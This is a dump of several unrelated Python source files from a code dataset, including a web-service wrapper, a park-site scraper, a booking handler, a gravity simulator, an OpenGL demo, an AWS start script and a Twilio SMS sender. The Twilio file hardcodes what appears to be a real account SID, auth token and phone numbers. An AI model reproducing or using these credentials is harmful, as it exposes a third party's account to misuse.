Sets email\r\n @param firstName: string - Sets First Name\r\n @param lastName: string - Sets Last Name\r\n @param *instRoles: all the rest of the params will turn into institutional roles. First one being primary.\r\n \"\"\"\r\n user = self.getUserByBatchId(studentId)\r\n if user is None:\r\n user = UserVO()\r\n user.userBatchUid=studentId\r\n user.isAvailable=isAvailable\r\n user.name=userName\r\n user.studentId=studentId\r\n extendedInfo = ExtendedInfoVO()\r\n extendedInfo.emailAddress = email\r\n extendedInfo.familyName = firstName\r\n extendedInfo.givenName = lastName\r\n user.extendedInfo = extendedInfo\r\n user.insRoles = insRoles\r\n return self.saveUser(user)\r\n \r\n def saveUser(self,userVO):\r\n request = saveUserRequest()\r\n request._user=[userVO.getUser_Def()]\r\n response = self.port.saveUser(request)\r\n return response._return\r\n \r\n def saveUsers(self,userVOs):\r\n request = saveUserRequest()\r\n ret = []\r\n for userVo in userVOs:\r\n ret.append(userVo.getUser_Def())\r\n request._user=ret\r\n response = self.port.saveUser(request)\r\n return response._return\r\n \r\n def deleteUser(self,userId):\r\n request = deleteUserRequest()\r\n request._userId=[userId]\r\n response = self.port.deleteUser(request)\r\n return response._return\r\n \r\n def deleteUsers(self,userIds):\r\n request = deleteUserRequest()\r\n request._userId=userIds\r\n response = self.port.deleteUser(request)\r\n return response._return\r\n \r\n def changeUserBatchUid(self,origionalBatchUid,newBatchUid):\r\n request = changeUserBatchUidRequest()\r\n request._originalBatchUid=origionalBatchUid\r\n request._batchUid=newBatchUid\r\n response = self.port.changeUserBatchUid(request)\r\n return response._return\r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"src/BbPy/UserWS.py","file_name":"UserWS.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"34704967","text":"import json\r\nimport random\r\nimport sys\r\nfrom learner import MyLearner, setupLearner\r\nimport examples\r\nimport time\r\n\r\nstart_time = time.time()\r\n\r\nwith open('params.json', 'r') as f:\r\n cfg = json.load(f)\r\n\r\nrandom.seed(cfg['random_seed'])\r\n\r\n# Load data\r\north = examples.load('data/3k/orth.csv', simplify=True)\r\nphon = examples.load('data/3k/phon.csv', simplify=True)\r\nwords = [x.strip() for x in open('data/3k/words.csv','r').readlines()]\r\n\r\nT = []\r\nwith open(\"brute-force_performance_{seed:d}.csv\".format(seed=cfg['random_seed']), 'w') as f:\r\n for k in range(cfg['samples_to_search']):\r\n training_set = random.sample(range(len(orth)), cfg['training_size'])\r\n T.append(training_set)\r\n for j in range(cfg['attempts_per_sample']):\r\n learner = setupLearner(\r\n hidden_layer_sizes=cfg['hidden_size'],\r\n max_iter=cfg['max_iter'],\r\n input_patterns=orth,\r\n target_patterns=phon)\r\n learner.fit(training_set)\r\n f.write(\"{sample:d},{attempt:d},{loss_train:.8f},{loss_test:.8f},{acc_train:.8f},{acc_test:.8f}\\n\".format(\r\n sample = k,\r\n attempt = j,\r\n loss_train = learner.loss_training(),\r\n loss_test = learner.loss(),\r\n acc_train = learner.acc_training(),\r\n acc_test = learner.acc()\r\n ))\r\n\r\n\r\nwith open(\"brute-force_test-sets_{seed:d}.csv\".format(seed=cfg['random_seed']), 'w') as f:\r\n for i,w in enumerate(words):\r\n f.write(\"{word:s},\".format(word=w))\r\n isTrainingItem = [i in T[j] for j in range(len(T))]\r\n f.write(\"{vec:s}\\n\".format(vec = ','.join([str(int(tf)) for tf in isTrainingItem])))\r\n\r\n\r\nprint(\"---- %s seconds -----\" % (time.time() - start_time))\r\n","sub_path":"results/FeedForward/Candide/Candide_unordered/brute-force/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"4994681","text":"#################################\n##### Name: Hang Song\n##### Uniqname: hangsong\n#################################\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\nimport secrets # file that contains your API key\n\nBASE_URL = \"https://www.nps.gov\"\nCACHE_FILENAME = \"national_parks_cache.json\"\nCACHE_DICT = {}\nMAP_URL = \"http://www.mapquestapi.com/search/v2/radius\"\n\nconsumer_key = secrets.CONSUMER_KEY\nconsumer_secret = secrets.CONSUMER_SECRET\n\n\nclass NationalSite:\n '''a national site\n\n Instance Attributes\n -------------------\n category: string\n the category of a national site (e.g. 'National Park', '')\n some sites have blank category.\n \n name: string\n the name of a national site (e.g. 'Isle Royale')\n\n address: string\n the city and state of a national site (e.g. 'Houghton, MI')\n\n zipcode: string\n the zip-code of a national site (e.g. '49931', '82190-0168')\n\n phone: string\n the phone of a national site (e.g. '(616) 319-7906', '307-344-7381')\n '''\n def __init__(self, category, name, address, zipcode, phone):\n self.category = category\n self.name = name\n self.address = address\n self.zipcode = zipcode\n self.phone = phone\n \n def info(self):\n return f\"{self.name} ({self.category}): {self.address} {self.zipcode}\"\n\n\ndef open_cache():\n ''' Opens the cache file if it exists and loads the JSON into\n the CACHE_DICT dictionary.\n if the cache file doesn't exist, creates a new cache dictionary\n\n Parameters\n ----------\n None\n\n Returns\n -------\n The opened cache: dict\n '''\n try:\n cache_file = open(CACHE_FILENAME, 'r')\n cache_contents = cache_file.read()\n cache_dict = json.loads(cache_contents)\n cache_file.close()\n except:\n cache_dict = {}\n return cache_dict\n\ndef save_cache(cache_dict):\n ''' Saves the current state of the cache to disk\n \n Parameters\n ----------\n cache_dict: dict\n The dictionary to save\n \n Returns\n -------\n None\n '''\n dumped_json_cache = json.dumps(cache_dict)\n fw = open(CACHE_FILENAME,\"w\")\n fw.write(dumped_json_cache)\n fw.close()\n\ndef make_request_with_cache(url):\n '''Check the cache for a saved result for this baseurl+params:values\n combo. If the result is found, return it. Otherwise send a new \n request, save it, then return it.\n\n Parameters\n ----------\n url: string\n\n Returns\n -------\n dict\n the results of the query as a dictionary loaded from cache\n JSON\n '''\n CACHE_DICT = open_cache()\n\n if (url in CACHE_DICT.keys()):\n print(\"Using Cache\")\n return CACHE_DICT[url]\n else:\n print(\"Fetching\")\n response = requests.get(url)\n CACHE_DICT[url] = response.text\n save_cache(CACHE_DICT)\n return CACHE_DICT[url]\n\ndef map_make_request_with_cache(url):\n CACHE_DICT = open_cache()\n\n if (url in CACHE_DICT.keys()):\n print(\"Using Cache\")\n return CACHE_DICT[url]\n else:\n print(\"Fetching\")\n response = requests.get(url)\n CACHE_DICT[url] = response.json()\n save_cache(CACHE_DICT)\n return CACHE_DICT[url]\n\n\ndef build_state_url_dict():\n ''' Make a dictionary that maps state name to state page url from \"https://www.nps.gov\"\n\n Parameters\n ----------\n None\n\n Returns\n -------\n dict\n key is a state name and value is the url\n e.g. {'michigan':'https://www.nps.gov/state/mi/index.htm', ...}\n '''\n main_url = \"https://www.nps.gov/index.htm\"\n url_text = make_request_with_cache(main_url)\n soup = BeautifulSoup(url_text, 'html.parser')\n \n state_list_parent = soup.find('div',class_ = 'SearchBar-keywordSearch input-group input-group-lg')\n state_list = state_list_parent.find_all('li')\n state_url_dict = {}\n\n for state_info in state_list:\n state_tag = state_info.find('a')\n state_detail_path = state_tag['href']\n state_detail_url = BASE_URL+state_detail_path\n state_url_dict[state_tag.string.lower()] = state_detail_url\n \n return state_url_dict\n \n\n\ndef get_site_instance(site_url):\n '''Make an instances from a national site URL.\n \n Parameters\n ----------\n site_url: string\n The URL for a national site page in nps.gov\n \n Returns\n -------\n instance\n a national site instance\n '''\n url_text = make_request_with_cache(site_url)\n soup = BeautifulSoup(url_text, 'html.parser')\n \n site_head_parent = soup.find('div',class_ = \"Hero-titleContainer clearfix\")\n site_name = site_head_parent.find('a').text\n site_category = site_head_parent.find('div',class_=\"Hero-designationContainer\").find('span',class_=\"Hero-designation\").text\n\n #check if address exists - Yosemite for example\n site_address_parent = soup.find('p',class_='adr')\n site_locality = None\n site_region = None\n site_zipcode = None\n site_address = None\n\n if site_address_parent is not None:\n site_locality = soup.find(\"span\",itemprop = \"addressLocality\").text\n site_region = soup.find(\"span\",itemprop = \"addressRegion\").text\n site_zipcode = soup.find(\"span\",itemprop = \"postalCode\").text.strip()\n site_address = site_locality + \", \" + site_region\n else:\n site_zipcode = 'No zipcode'\n site_address = 'No address'\n\n site_phone = soup.find(\"span\",itemprop =\"telephone\").text.strip()\n\n national_site = NationalSite(category = site_category, name = site_name, address = site_address, zipcode= site_zipcode, phone = site_phone)\n\n return national_site\n\n\ndef get_sites_for_state(state_url):\n '''Make a list of national site instances from a state URL.\n\n Parameters\n ----------\n state_url: string\n The URL for a state page in nps.gov\n\n Returns\n -------\n list\n a list of national site instances\n '''\n url_text = make_request_with_cache(state_url)\n soup = BeautifulSoup(url_text, 'html.parser')\n\n park_instance_list = []\n\n park_info_parent = soup.find(id=\"list_parks\")\n park_info = park_info_parent.find_all('h3')\n\n for park in park_info:\n park_ref = park.find('a')['href']\n park_url = BASE_URL+park_ref+'index.htm'\n parkinstance = get_site_instance(park_url)\n park_instance_list.append(parkinstance)\n\n return park_instance_list\n\ndef construct_unique_key(baseurl,params):\n '''construct api_key according to the input.\n Parameters\n ----------\n baseurl: string\n The URL for a state page in mapquest\n params: dictionary\n Contains the parameters associated with the API request \n\n Returns\n -------\n string\n a string constructed from the baseurl and params\n '''\n param_strings = []\n connector = '&'\n for k in params.keys():\n param_strings.append(f'{k}={params[k]}')\n param_strings.sort()\n unique_key = baseurl + '?' + connector.join(param_strings)\n return unique_key\n\n\ndef get_nearby_places(site_object):\n '''Obtain API data from MapQuest API.\n\n Parameters\n ----------\n site_object: object\n an instance of a national site\n\n Returns\n -------\n dict\n a converted API return from MapQuest API\n '''\n origin = site_object.zipcode\n params = {'origin':origin,'radius':10,'maxMatches':10,'ambiguities':'ignore','outFormat':'json','key':consumer_key}\n map_api_key = construct_unique_key(MAP_URL,params)\n response_dict = map_make_request_with_cache(map_api_key)\n\n return response_dict\n\ndef print_nearby_places(map_api_dict):\n '''Print nearby places .\n\n Parameters\n ----------\n map_api_dict: dictionary\n a converted API dictionary related to the chosen site\n\n Returns\n -------\n None\n '''\n results_list = map_api_dict['searchResults']\n for result in results_list:\n place_name = result['name']\n place_category = result['fields']['group_sic_code_name']\n place_address = result['fields']['address']\n place_city = result['fields']['city']\n if len(place_category) == 0:\n place_category = 'no category'\n if len(place_address) == 0:\n place_address = 'no address'\n if len(place_city) == 0:\n place_city = 'no city'\n print(f\"- {place_name} ({place_category}): {place_address}, {place_city}\")\n\n\n\nif __name__ == \"__main__\":\n np_url_dict = build_state_url_dict()\n # print(np_url_dict)\n\n # np = get_site_instance(\"https://www.nps.gov/frst/index.htm\")\n\n \n while True:\n state = input(\"Enter a state name (e.g. Michigan, michigan) or 'exit': \")\n \n if state.lower() == \"exit\":\n exit()\n elif state.lower() not in np_url_dict:\n print('[Error] Enter a state name.\\n')\n continue\n else:\n print(\"-\"*40)\n print(f\"List of national sites in {state.title()}\")\n print(\"-\"*40)\n state_url = np_url_dict[state.lower()]\n state_nps_list = get_sites_for_state(state_url)\n num = 1\n for park in state_nps_list :\n print(f\"[{num}] {park.info()}\")\n num = num+1\n \n print('-'*40)\n while True:\n num = input(\"Choose the number for detail search or 'exit' or 'back': \")\n if num == 'exit':\n exit()\n elif num == 'back':\n break\n elif num.isnumeric() and int(num) >= 1 and int(num) <= len(state_nps_list):\n site_chose = state_nps_list[int(num)-1]\n site_api_dict = get_nearby_places(site_chose)\n print(\"-\"*40)\n print(f\"Show places that are near {site_chose.name}\")\n print(\"-\"*40)\n print_nearby_places(site_api_dict)\n else:\n print('[Error] Invalid Input')\n print('-'*40)\n continue\n\n\n","sub_path":"proj2_nps.py","file_name":"proj2_nps.py","file_ext":"py","file_size_in_byte":9978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"590194425","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ngeolift = np.loadtxt(\"geolift.txt\",dtype=np.float64) #将文件写入数组\nn0 = len(geolift)\n\n#Y1 = np.ones(n0) #存储投影后的网格点的y坐标\n#Z1 = np.ones(n0) #存储网格点的z坐标\n#存储表面力\ndFy0 = np.ones(n0) #存储网格点的x坐标\nprint(n0)\n\nfor i in range(0,n0):\n dFy0[i] = geolift[i][4]\n\n\ns = 0\nfor i in range(1,n0):\n s = s + dFy0[i]\n\nprint(2*s)\n","sub_path":".history/test_20210422214624.py","file_name":"test_20210422214624.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"556371451","text":"\"\"\"Calendar class\"\"\"\n\n\nfrom datetime import datetime\nfrom calendar import Calendar\nfrom match import Match\nfrom team import Team\n\nclass Handler:\n \"\"\"Booking handler\"\"\"\n\n def __init__(self):\n \"\"\"Initializing\"\"\"\n self.matches = []\n self.teams = []\n self.calendar = Calendar(datetime.now().year)\n\n def _read_int(self, prompt, minval=None, maxval=None):\n \"\"\"Read an integer value from keyboard\"\"\"\n while True:\n try:\n val = int(input(prompt))\n if minval is not None and val < minval:\n print('*** The minimum allowed value is %d' % minval)\n elif maxval is not None and val > maxval:\n print('*** The maximum allowed value is %d' % maxval)\n else:\n return val\n except ValueError:\n print('*** Please enter an integer')\n\n def _book_day(self, day, match):\n \"\"\"Book a match on a specific day\"\"\"\n day.book(match)\n self.matches.append(match)\n\n def create_match(self):\n \"\"\"Create a new match\"\"\"\n if len(self.teams) < 2:\n print('At least two registered teams required to book a match')\n return\n num_months = len(self.calendar.months)\n month = self.calendar.get_month(self._read_int('Choose month (1–%d): ' % num_months, 1, num_months))\n num_days = month.get_length()\n day = month.get_day(self._read_int('Choose day (1–%d): ' % num_days, 1, num_days))\n if day.is_booked():\n print('')\n print('That day is already booked for the following match:')\n print(day.match)\n return\n print('')\n self.list_teams()\n print('')\n num_teams = len(self.teams)\n team1 = self._read_int('Choose first team: ', 1, num_teams)\n while True:\n team2 = self._read_int('Choose second team: ', 1, num_teams)\n if team1 != team2:\n break\n print('*** Please choose a different team')\n\n sport = input('Choose sport: ').strip()\n match = Match(sport, (self.teams[team1 - 1], self.teams[team2 - 1]))\n self._book_day(day, match)\n print('')\n print('Match booked on %d %s:' % (day.number, month.name))\n print(match)\n\n def create_team(self):\n \"\"\"Create a new team\"\"\"\n print('')\n self.list_teams()\n print('')\n name = input('Team name (blank to cancel): ').strip()\n if not name:\n return\n self.teams.append(Team(name))\n print(\"Team '%s' created\" % name)\n\n def list_calendar(self):\n \"\"\"Output the calendar\"\"\"\n print('=== %d ===' % self.calendar.year)\n num_months = len(self.calendar.months)\n for i in range(1, num_months + 1):\n print('%s) %s' % (i, self.calendar.get_month(i)))\n\n print('')\n num = self._read_int('Choose month (0 to cancel): ', 0, num_months)\n if not num:\n return\n print('')\n month = self.calendar.get_month(num)\n print('=== %s %d ===' % (month.name, self.calendar.year))\n for d in range(1, month.get_length() + 1):\n print(month.get_day(d))\n\n def list_matches(self):\n \"\"\"Output all currently booked matches\"\"\"\n if not self.matches:\n print('=== No matches ===')\n return\n print('=== Booked matches ===')\n for m in range(1, len(self.calendar.months) + 1):\n month = self.calendar.get_month(m)\n for d in range(1, month.get_length() + 1):\n day = month.get_day(d)\n if day.is_booked():\n print('')\n print('%d %s:' % (day.number, month.name))\n print(day.match)\n continue\n\n def list_teams(self):\n \"\"\"Output all registered teams\"\"\"\n if not self.teams:\n print('=== No teams ===')\n return\n print('=== Teams ===')\n for i, team in enumerate(self.teams):\n print('%d) %s' % (i + 1, team))\n","sub_path":"iloot/me/kmom06/booking/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"276091184","text":"\"\"\"\n------------------------------------------------------\nDays, hours, seconds library\n-------------------------------------------------------\nAuthor: Minesh Varu\nID: 110814300\nEmail: varu4300@mylaurier.ca\nVersion: May 23, 2012\n-------------------------------------------------------\n\"\"\"\nseconds = 60\nhours_in_day = 24\n\"\"\"\n-------------------------------------------------------\nDays, hours, seconds Function\n-------------------------------------------------------\nPreconditions:\n total_seconds: total seconds entered (int > 0)\nPostconditions:\n returns:\n minutes: The amount of minutes from total seconds (int)\n hours: The amount of hours from total seconds (int)\n days: the amount of days from total seconds (int)\n-------------------------------------------------------\n\"\"\"\ndef time_values(total_seconds):\n minutes = int(total_seconds / seconds)\n hours = int(minutes / seconds)\n days = int(hours / hours_in_day)\n return minutes, hours, days\n","sub_path":"CP104/Assignements/varu4300_a3/src/Question3.py","file_name":"Question3.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"540752324","text":"import numpy as np\n#import cupy as np\nimport math\nfrom timeit import default_timer as timer\n\n#TODO: general speed optimization\n\n#the gravitational constant\nG = 6.673e-11\n#delta t\n#TODO: speed up calc, up this factor and only display every x frames to decrease error\n#t = 5e-6 \nt = 100\n\n#calculates the next location of the objects for each frame\n#equation used is verlet velocity scheme\ndef calc_position(objs):\t\n\tobjs[\"loc\"] = objs[\"loc\"] + objs[\"vel\"] * t + 0.5 * objs[\"accel\"] * t**2\n\tobjs[\"loc\"] = objs[\"loc\"].clip(0, 1e9)\n\ta_t = objs[\"accel\"]\n\tobjs[\"accel\"] = calc_accel_linear(objs[\"loc\"], objs[\"mass\"])\n\t#objs[\"accel\"] = calc_accel(objs[\"loc\"], objs[\"mass\"])\n\n\tobjs[\"vel\"] = objs[\"vel\"] + 0.5 * (a_t + objs[\"accel\"]) * t\n\n\treturn objs\n\n#gets delta between simple accel and linear accel functions\ndef get_delta(objs_loc, objs_m):\n\treturn calc_accel(objs_loc, objs_m) - calc_accel_linear(objs_loc, objs_m)\n\n#calcs acceleration in the x and y directions\n#this is a test func for the 2-body problem\ndef calc_accel(objs_loc, objs_m):\n\t#start = timer()\n\n\tx_1 = objs_loc[0, 0]\n\ty_1 = objs_loc[0, 1]\n\tx_2 = objs_loc[1, 0]\n\ty_2 = objs_loc[1, 1]\n\n\tm_1 = objs_m[0]\n\tm_2 = objs_m[1]\n\n\t#delta x\n\td_x = x_1 - x_2\n\n\n\t#print(d_x)\n\n\t#delta y\n\td_y = y_1 - y_2\n\n\t#print(d_y)\n\n\t#|r|^3\n\tr_3 = math.sqrt(d_x**2 + d_y**2)**3\n\n\t#print(r_3)\n\n\tif (r_3 == 0):\n\t\treturn np.asarray([\n\t\t\t\t[0, 0],\n\t\t\t\t[0, 0]\n\t\t\t])\n\n\t#begin full calcs\n\n\tx1_a = (G * m_2 * d_x * -1) / r_3\n\ty1_a = (G * m_2 * d_y * -1) / r_3\n\n\tx2_a = (G * m_1 * d_x) / r_3\n\ty2_a = (G * m_1 * d_y) / r_3\n\n\t#end = timer()\n\n\t#print(\"simple elapsed time:\", end - start)\n\n\treturn np.asarray([ \n\t\t[x1_a, y1_a],\n\t\t[x2_a, y2_a]\n\t])\n\n#calcs acceleration in the x and y directions\n#uses fancy linear algebra magic\n#TODO: see if x/y parts can't be done at once\ndef calc_accel_linear(objs_loc, objs_m):\n\t#start = timer()\n\n\t#vector of x, y coords\n\tx_v = objs_loc[:,0]\n\ty_v = objs_loc[:,1]\n\n\t#number of objs\n\tn = x_v.size\n\n\t#stack those vectors\n\t#stacks downwards\n\tx_m = np.tile(x_v, (n, 1))\n\ty_m = np.tile(y_v, (n, 1))\n\n\t#subtract from the transpose to get the deltas\n\td_x = x_m - x_m.T\n\td_y = y_m - y_m.T\n\n\t#distance cubed\n\tr_3 = np.power(np.sqrt(np.power(d_x, 2) + np.power(d_y, 2)), 3)\n\n\tm_m = np.tile(objs_m, (n, 1))\n\n\tz_x = (m_m * d_x).T\n\tz_y = (m_m * d_y).T\n\n\ta_x = np.sum(np.nan_to_num((G * z_x) / r_3), 0)\n\ta_y = np.sum(np.nan_to_num((G * z_y) / r_3), 0)\n\n\ta = np.stack((a_x, a_y), axis=-1)\n\n\t#end = timer()\n\n\t#print(\"numpy elapsed time:\", end - start)\n\n\treturn a","sub_path":"position_calculator.py","file_name":"position_calculator.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"78042185","text":"''' Scatters a bunch of blocks around a scene, to demonstrate the\ntranslate-rotate-scale affine transformations.\n\nWritten by Scott D. Anderson\nscott.anderson@acm.org\nFall 2003\n\nAdapted to use Python, Fall 2009\n'''\n\nimport sys\n\nfrom TW import *\n\n### ================================================================\n\n### This program sometimes draws a block \"by hand,\" instead of using\n### the GLUT object. The following array holds the 8 vertices. Unlike\n### the GLUT object, which has the origin in the center, this block\n### has the origin at one corner. This makes scaling a little easier\n### sometimes. \n\nvertices = (\n (0,0,0),(1,0,0),(1,1,0),(0,1,0),\n (0,0,1),(1,0,1),(1,1,1),(0,1,1)\n)\n\n\ndef face(a, b, c, d):\n \"\"\"This function draws one face of the wire cube given the indices\nof the four vertices. Since it is wire, it doesn't matter whether the\nvertices are counter-clockwise, but we'll try to do that anyhow.\"\"\"\n glBegin(GL_LINE_LOOP)\n glVertex3fv(vertices[a])\n glVertex3fv(vertices[b])\n glVertex3fv(vertices[c])\n glVertex3fv(vertices[d])\n glEnd()\n\ndef myCube():\n '''draws a unit cube where the reference point is the lower left\n front corner (like the barn), rather than the center.'''\n # This is a little inefficient, since every edge gets drawn twice,\n # since each edge is the boundary between two faces. However, this\n # organizes the code, generalizes to solid objects, and introduces\n # the idea of the inside and outside faces of a surface.\n face(0,1,2,3) # front\n face(7,6,5,4) # back\n face(4,5,1,0) # bottom\n face(1,5,6,2) # right\n face(0,3,7,4) # left\n face(2,6,7,3) # top\n\n\ndef display():\n '''An ordinary display function, drawing a succession of blocks.\nEach has a different color, so that you can match up the graphic block\nwith the code that draws it. For each block, try to figure out where\nit is and how it looks, just by visualizing the transformations.\nThat's good practice for using the affine transformations in your own\nmodeling.'''\n\n twDisplayInit()\n twCamera()\n\n # draw ground\n twColorName(TW_BLACK)\n twGround()\n\n # origin\n twColorName(TW_WHITE)\n glutWireCube(1)\n\n # translate only\n twColorName(TW_RED)\n glPushMatrix()\n glTranslatef(2,3,4)\n glutWireCube(1)\n glPopMatrix()\n\n # translate and scale. Look out below!\n twColorName(TW_GREEN)\n glPushMatrix()\n glTranslatef(4,0,5)\n glScalef(2,2,2)\n glutWireCube(1)\n glPopMatrix()\n\n # compensating in the translation\n twColorName(TW_BLUE)\n glPushMatrix()\n glTranslatef(8,1,1)\n glScalef(2,2,2)\n glutWireCube(1)\n glPopMatrix()\n\n # using a different reference point\n twColorName(TW_MAGENTA)\n glPushMatrix()\n glTranslatef(9,0,1)\n glScalef(2,2,2)\n myCube()\n glPopMatrix()\n\n # stacking some rotated blocks\n twColorName(TW_YELLOW)\n glPushMatrix()\n glTranslatef(1,1,8)\n glScalef(2,2,2)\n glutWireCube(1)\n glPopMatrix()\n\n twColorName(TW_ORANGE)\n glPushMatrix()\n glTranslatef(1,3,8)\n glRotatef(30,0,1,0) # 30 degrees around y\n glScalef(2,2,2)\n glutWireCube(1)\n glPopMatrix()\n\n twColorName(TW_BROWN)\n glPushMatrix()\n glTranslatef(1,5,8)\n glRotatef(60,0,1,0) # degrees around y\n glScalef(2,2,2)\n glutWireCube(1)\n glPopMatrix()\n\n # non-uniform scaling\n twColorName(TW_CYAN)\n glPushMatrix()\n glTranslatef(8,0,8)\n glRotatef(45,0,1,0) # degrees around y\n glScalef(1,5,1)\n glutWireCube(1)\n glPopMatrix()\n \n twColorName(TW_TEAL)\n glPushMatrix()\n glTranslatef(9,0,9)\n glRotatef(45,0,1,0) # degrees around y\n glScalef(1,5,1)\n myCube()\n glPopMatrix()\n\n glFlush()\n glutSwapBuffers()\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode( GLUT_DOUBLE | GLUT_RGB | GLUT_DEPTH)\n twBoundingBox(0,10,0,5,0,10)\n twInitWindowSize(500,500)\n glutCreateWindow(sys.argv[0])\n glutDisplayFunc(display)\n # nice fat lines. In this program, we only need to say this once\n glLineWidth(3) \n ## twSetMessages(TW_ALL_MESSAGES)\n twMainInit()\n glutMainLoop()\n\nif __name__ == '__main__':\n main()\n","sub_path":"pytw/demos/modeling/Blocks.py","file_name":"Blocks.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"551285063","text":"\"\"\"\n 使用Twilio官网提供的免费的信息服务,每个月15美元的额度\n 使用前请安装twilio:pip install twilio\n 每条短信0.028美元,每个月可以发500多条短信,所以尽量只在需要的时候调用该接口发送短信。\n\"\"\"\nfrom twilio.rest import Client\n\n\ndef send(msg='No Content.', to=\"+8618813092702\"):\n \"\"\"\n 发送短信\n :param msg: 短信内容\n :param to: 接收号码\n :return:\n \"\"\"\n account_sid = 'AC6211336838c38a445b7c5c7b237b4510'\n auth_token = 'ab0b9ab3911d4f87a2d26628ead3d6ca'\n from_number = '+19786366084'\n\n client = Client(account_sid, auth_token)\n try:\n client.messages.create(to=to, from_=from_number, body=msg)\n # print('短信已经发送:\\nfrom:\\t{}\\nto:\\t{}\\ncontent:\\t\\t{}\\n'.format(from_number,to.split('+86')[1],msg))\n except Exception as e:\n # print('短信发送失败,账号欠费或者未被验证!')\n return e","sub_path":"sendSMS.py","file_name":"sendSMS.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"24003289","text":"import boto3\nfrom botocore.exceptions import ClientError\n\n\nInstanceID = \"i-060109211f50178a6\"\n\nec2 = boto3.client('ec2', region_name='us-west-1')\n\ntry:\n ec2.start_instances(InstanceIds=[InstanceID], DryRun=True)\nexcept ClientError as e:\n if 'DryRunOperation' not in str(e):\n print(\"You don't have permission to reboot instances.\")\n raise\n\ntry:\n response = ec2.start_instances(InstanceIds=[InstanceID], DryRun=False)\n print('Success', response)\nexcept ClientError as e:\n print('Error', e)","sub_path":"start_ec2.py","file_name":"start_ec2.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"45809493","text":"\"\"\"\n This file is part of GNUKhata:A modular,robust and Free Accounting System.\n\n GNUKhata is Free Software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as\n published by the Free Software Foundation; either version 3 of\n the License, or (at your option) any later version.\n\n GNUKhata is distributed in the hope that it will be useful, but\n WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public\n License along with GNUKhata (COPYING); if not, write to the\n Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,\n Boston, MA 02110-1301 USA59 Temple Place, Suite 330,\n\t\tcontributors: anusha kadambala\n\n\"\"\"\n\nimport logging\n\nfrom pylons import request, response, session, tmpl_context as c\nfrom pylons.controllers.util import abort, redirect\nfrom pylons.decorators import jsonify\nfrom pylons import app_globals\nfrom datetime import datetime\nfrom gnukhata.lib.base import BaseController, render\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import Paragraph, SimpleDocTemplate, Table,PageBreak,Spacer\nfrom reportlab.lib import colors\nimport datetime,time\nfrom time import strftime\n\nlog = logging.getLogger(__name__)\n\nclass PaymentController(BaseController):\n\n\tdef index(self):\n\t\tc.flag = \"n\"\n\t\tpayment = app_globals.server_proxy.account.getAllAccountNamesByLedger(session[\"gnukhata\"])\n\t\tpaymentacc = []\n\t\t#populate existing account list\n\t\tfor db in payment:\n\t\t\tpaymentacc.append(db[0])\n\t\tc.bank = paymentacc\n\t\t# get current voucher code\n\t\tres = app_globals.server_proxy.voucher.getVoucherCode(session[\"gnukhata\"])\n\t\tif res == False:\n\t\t\tc.vouchercode = 1\n\t\telse:\n\t\t\tc.vouchercode = res\n\t\t# get current date \n\t\tc.date=str(strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\tc.displayStatus = False\t\t\t\n\t\treturn render('/payment voucher.mako')\t\n\t\n\tdef setVoucher(self):\n\t\t\n\t\tc.flag = request.params[\"flag\"]\n\t\t# Add payment Voucher.\n\t\tif c.flag == \"n\":\n\t\t\tc.payment = self.getAllAccounts()\n\t\t\tself.vouchertype = \"payment\"\n\t\t\t# get current date\n\t\t\tself.date=str(strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\t\tself.queryParams_master=[str(request.params[\"vouchercode\"]),self.date,request.params[\"date\"],request.params[\"narration\"]]\n\t\t\t#self.lastrow = request.params[\"rowCount\"]\n\t\t\tself.queryParams_details = []\n\t\t\tfor i in range(0,len(request.params.getall('cr_dr'))):\n\n\t\t\t\tif str(request.params.getall(\"cr_dr\")[i]) == 'cr':\n\t\t\t\t\tqueryParams_details =[request.params[\"vouchercode\"],request.params.getall(\"cr_dr\")[i],request.params.getall(\"accountname\")[i],request.params.getall(\"credit_amount\")[i]]\n\t\t\t\tif str(request.params.getall(\"cr_dr\")[i]) == 'dr':\n\t\t\t\t\tqueryParams_details =[request.params[\"vouchercode\"],request.params.getall(\"cr_dr\")[i],request.params.getall(\"accountname\")[i],request.params.getall(\"debit_amount\")[i]]\n\t\t\t\tself.queryParams_details.append(queryParams_details)\n\t\t\t\t\n\t\t\tself.queryParams=[request.params[\"vouchercode\"],self.vouchertype]\n\t\t\t\n\t\t\ttrial = app_globals.server_proxy.cashbook.setCashBook(self.queryParams_master,self.queryParams_details,session[\"gnukhata\"])\n\t\t\tres = app_globals.server_proxy.voucher.setVoucher(self.queryParams,session[\"gnukhata\"])\n\t\t\tif res == 